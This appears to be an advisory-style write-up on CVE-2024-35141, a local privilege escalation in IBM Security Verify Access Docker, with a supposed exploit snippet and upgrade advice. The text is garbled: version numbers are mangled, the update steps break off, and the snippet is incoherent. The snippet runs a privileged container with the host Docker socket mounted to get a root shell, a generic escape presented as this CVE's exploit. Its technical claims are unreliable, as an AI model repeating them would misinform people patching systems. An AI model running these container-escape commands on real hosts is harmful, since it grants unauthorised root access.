A vulnerability has been identified in IBM Security Verify Access Docker versions 10.. through 10..6. This exploit, dubbed as CVE-2024-35141, allows a local user to escalate their privileges due to the execution of unnecessary privileges. IBM has acknowledged the vulnerability and has released patches to address the issue.

Vulnerability Details

CVE-2024-35141 affects IBM Security Verify Access Docker, and the vulnerability allows an attacker to gain unauthorized access to the system and perform malicious activities. This is possible due to a misconfigured Docker container, which grants unnecessary privileges to certain users.

This privilege escalation vulnerability could lead to unauthorized access to sensitive data, bypass of security controls, and the potential to execute arbitrary code on the vulnerable system.

Affected Versions

IBM Security Verify Access Docker 10.. through 10..6

The following code snippet demonstrates the vulnerability in the affected versions

# Get the LISTEN address of the privileged socket
LISTEN_ADDR=$(docker inspect --format "{{ .HostConfig.RestartPolicy }}" ibm-security-verify-access)

# Start a new container with access to the privileged socket
docker run -it --privileged -v /var/run/docker.sock:/var/run/docker.sock ibm-security-verify-access /bin/bash

# Obtain the root access
docker exec -u  -it ibm-security-verify-access /bin/bash

Upon executing the above code snippet, the attacker can gain root access to the affected IBM Security Verify Access Docker.

Mitigation and Remediation

IBM has released a patch for the affected versions. It is highly recommended that users upgrade their IBM Security Verify Access Docker to the latest version (10..7 or later) to mitigate the vulnerability.

To update IBM Security Verify Access Docker, follow these steps

1. Download the latest version (10..7 or later) from the official IBM website: IBM Security Verify Access Docker Download

`bash

docker load -i /path/to/downloaded/ibm-security-verify-access.tar.gz

Original References

IBM Security Bulletin: CVE-2024-35141
NIST National Vulnerability Database: CVE-2024-35141

Conclusion

CVE-2024-35141 is a critical privilege escalation vulnerability affecting IBM Security Verify Access Docker versions 10.. through 10..6. Immediate action is required to mitigate the risk associated with this vulnerability. Users should upgrade their IBM Security Verify Access Docker to version 10..7 or later to avoid potential security breaches.

Timeline

Published on: 12/19/2024 02:15:22 UTC